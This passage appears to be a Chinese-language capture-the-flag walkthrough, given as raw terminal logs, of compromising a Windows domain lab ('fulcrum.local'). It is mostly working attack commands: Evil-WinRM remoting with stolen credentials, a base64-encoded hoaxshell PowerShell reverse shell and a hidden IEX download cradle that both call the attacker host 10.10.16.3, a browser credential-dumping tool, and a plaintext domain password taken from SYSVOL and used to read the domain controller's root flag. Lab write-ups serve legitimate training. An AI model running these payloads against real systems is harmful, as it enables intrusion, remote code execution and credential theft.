   Host Name . . . . . . . . . . . . : FILE   Primary Dns Suffix  . . . . . . . : fulcrum.local   Node Type . . . . . . . . . . . . : Hybrid   IP Routing Enabled. . . . . . . . : No   WINS Proxy Enabled. . . . . . . . : No   DNS Suffix Search List. . . . . . : fulcrum.local
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection   Physical Address. . . . . . . . . : 52-54-00-9E-52-F3   DHCP Enabled. . . . . . . . . . . : Yes   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::7951:5c86:6630:5e64%3(Preferred)   IPv4 Address. . . . . . . . . . . : 192.168.122.132(Preferred)   Subnet Mask . . . . . . . . . . . : 255.255.255.0   Lease Obtained. . . . . . . . . . : Saturday, September 3, 2022 12:29:10 AM   Lease Expires . . . . . . . . . . : Saturday, September 3, 2022 4:43:37 AM   Default Gateway . . . . . . . . . : 192.168.122.1   DHCP Server . . . . . . . . . . . : 192.168.122.1   DHCPv6 IAID . . . . . . . . . . . : 106058752   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2A-09-35-75-52-54-00-9E-52-F3   DNS Servers . . . . . . . . . . . : 192.168.122.130                                       1.1.1.1   NetBIOS over Tcpip. . . . . . . . : Enabled*Evil-WinRM* PS C:\inetpub\wwwroot>

我可以测试一下它能不能访问我已经拿下的linux主机：

root@fulcrum:~# tcpdump -I virbr0 -w test.pcaptcpdump: virbr0: That device doesn't support monitor moderoot@fulcrum:~# tcpdump -i virbr0 -w test.pcaptcpdump: listening on virbr0, link-type EN10MB (Ethernet), capture size 262144 bytes

*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ping 192.168.122.1 }
Pinging 192.168.122.1 with 32 bytes of data:Reply from 192.168.122.1: bytes=32 time<1ms TTL=64Reply from 192.168.122.1: bytes=32 time=2ms TTL=64Reply from 192.168.122.1: bytes=32 time<1ms TTL=64Reply from 192.168.122.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.122.1:    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:    Minimum = 0ms, Maximum = 2ms, Average = 0ms*Evil-WinRM* PS C:\inetpub\wwwroot>

那能出网么？

*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ping 10.10.16.3 }
Pinging 10.10.16.3 with 32 bytes of data:Reply from 10.10.16.3: bytes=32 time=259ms TTL=62Reply from 10.10.16.3: bytes=32 time=562ms TTL=62Reply from 10.10.16.3: bytes=32 time=140ms TTL=62Reply from 10.10.16.3: bytes=32 time=297ms TTL=62
Ping statistics for 10.10.16.3:    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:    Minimum = 140ms, Maximum = 562ms, Average = 314ms*Evil-WinRM* PS C:\inetpub\wwwroot>

可以。很好，那我可以直接反弹一个powershell 的shell：

*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { powershell -e JABzAD0AJwAxADAALgAxADAALgAxADYALgAzADoAOAAwADgAMAAnADsAJABpAD0AJwA4ADEAMwA2AGUAMQBhAGQALQAxAGIAOAA5AGIAMwBjAGIALQA3ADYAMwBmAGMAZAA5AGUAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AOAAxADMANgBlADEAYQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADAAYwA1ADIALQA3AGUANgBlACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADEAYgA4ADkAYgAzAGMAYgAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAwAGMANQAyAC0ANwBlADYAZQAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwA3ADYAMwBmAGMAZAA5AGUAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAwAGMANQAyAC0ANwBlADYAZQAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0A }

CrazyInSide:~/Toolbox/hoaxshell$ python3 hoaxshell.py -s 10.10.16.3
    ┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬      ├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │      ┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘                           by t3l3machus
[Info] Generating reverse shell payload...powershell -e JABzAD0AJwAxADAALgAxADAALgAxADYALgAzADoAOAAwADgAMAAnADsAJABpAD0AJwA4ADEAMwA2AGUAMQBhAGQALQAxAGIAOAA5AGIAMwBjAGIALQA3ADYAMwBmAGMAZAA5AGUAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AOAAxADMANgBlADEAYQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADAAYwA1ADIALQA3AGUANgBlACIAPQAkAGkAfQA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAkAGMAPQAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvADEAYgA4ADkAYgAzAGMAYgAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAwAGMANQAyAC0ANwBlADYAZQAiAD0AJABpAH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcAAkAHMALwA3ADYAMwBmAGMAZAA5AGUAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAwAGMANQAyAC0ANwBlADYAZQAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0A[Info] Type "help" to get a list of the available prompt commands.[Info] Http Server started on port 8080.[Important] Awaiting payload execution to initiate shell session...[Shell] Payload execution verified![Shell] Stabilizing command prompt...
PS C:\Users\BTables\Documents> whoamifulcrum\btables
PS C:\Users\BTables\Documents>

终于见到了user.txt：

PS C:\Users\BTables> cd Desktop

PS C:\Users\BTables\Desktop> lsDirectory: C:\Users\BTables\Desktop

Mode                LastWriteTime         Length Name                                             ----                -------------         ------ ----                                             -a----         5/8/2022   1:48 AM             32 user.txt                                         
PS C:\Users\BTables\Desktop> cat user.txtfc......................................

用户权限没有什么特殊的，先开始搜集密码：

PS C:\Users\BTables\Downloads> copy \\10.10.16.3\share\hack-browser-data-windows-64bit.exe .

PS C:\Users\BTables\Downloads> lsDirectory: C:\Users\BTables\Downloads

Mode                LastWriteTime         Length Name                                             ----                -------------         ------ ----                                             -a----         9/2/2022   8:58 PM        8162816 hack-browser-data-windows-64bit.exe              
PS C:\Users\BTables\Downloads> .\hack-browser-data-windows-64bit.exe -b all -f json --dir results -zip

什么都没有：

[NOTICE] [browser.go:47,pickChromium] find browser Chrome Beta failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser OperaGX failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Vivaldi failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser CocCoc failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser QQ failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Chrome failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Microsoft Edge failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Chromium failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Opera failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Brave failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser Yandex failed, profile folder does not exist  [NOTICE] [browser.go:47,pickChromium] find browser 360speed failed, profile folder does not exist  [NOTICE] [browser.go:91,pickFirefox] find browser firefox Firefox failed, profile folder does not exist  [ERROR] [main.go:66,func1] open results: The system cannot find the file specified.  [NOTICE] [main.go:68,func1] compress success

共享也只有默认的：

PS C:\Users\BTables\Downloads> Get-SMBShare[Important] Session has been idle for more than 10.8 seconds. Shell probably died.Name   ScopeName Path Description  ----   --------- ---- -----------  ADMIN$ *              Remote Admin C$     *              Default shareIPC$   *              Remote IPC   

PS C:\Users\BTables\Downloads>

这种shell不太好用，崩掉了。我尝试定位域控：

*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { nslookup dc.fulcrum.local }
Server:  DCAddress:  192.168.122.130
Name:    dc.fulcrum.localAddress:  192.168.122.130
*Evil-WinRM* PS C:\Users\WebUser\Documents>

域控似乎只有那台file能访问：

root@fulcrum:~# nc -zv 192.168.122.130 445

上线了：

*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.3:80/a'))" }

域控上有两个共享，在sysvol中有很多很多powershell脚本：

在其中能够搜索到923a用户的凭证：

*Evil-WinRM* PS C:\Users\WebUser\Documents> $pass = ConvertTo-SecureString '@fulcrum_bf392748ef4e_$' -AsPlainText -Force*Evil-WinRM* PS C:\Users\WebUser\Documents> $cred = New-Object System.Management.Automation.PSCredential('FULCRUM\923a', $pass)*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -Computer dc.fulcrum.local -Credential $cred -scriptblock { whoami}fulcrum\923a*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -Computer dc.fulcrum.local -Credential $cred -scriptblock { cat \users\administrator\desktop\root.txt }8d.....................................*Evil-WinRM* PS C:\Users\WebUser\Documents>